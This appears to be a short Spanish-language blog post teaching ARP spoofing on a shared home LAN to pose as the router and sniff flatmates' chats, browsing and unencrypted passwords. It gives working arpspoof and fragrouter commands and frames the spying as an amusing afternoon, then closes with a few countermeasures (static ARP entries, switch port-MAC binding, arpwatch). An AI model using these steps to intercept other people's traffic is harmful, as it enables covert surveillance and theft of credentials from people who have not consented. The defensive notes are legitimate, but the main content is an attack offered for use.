Sí señores como lo oyen, vamos a hacernos pasar por el router en nuestra LAN, esto nos permitirá ver las conversaciones de chat, messenger de nuestros compañeros de piso, las páginas que visitan, sus passwords siempre que no estén cifrados, lo que se dice pasar una tarde entretenida vamos.Primero instalamos el software necesario:
apt-get install dsniff fragrouter
En este momento empieza el juego:
arpspoof -i "interfaz" -t "IP Victima" "IP Router"
Habilitamos el enrutado:
fragrouter -B1
Ahora arrancamos nuestro sniffer preferido y ya está, funciona perfectamente, comprobado.
Para evitar esta intromisión se puede recurrir a las tablas definidas de forma estática:
arp -s "IP Router" "MAC Router"
Bueno creo que es un artículo de lo más interesante y como siempre espero que a alguien le sirva.
NOTA: Si estamos en una empresa seguramente empleen electrónica de red decente, en los equipos Cisco por ejemplo se puede configurar cada puerto para una MAC determinada, con esto el ataque perdería toda su eficacia.
Si estamos a cargo de una red y no queremos permitir este tipo de actividades existe un software muy interesante llamado arpwatch, este nos informará cuando algún equipo cambie de MAC.
Con la ayuda de arpwatch ya podemos olernos que algo raro está ocurriendo.
Entradas
No hay comentarios:
Publicar un comentario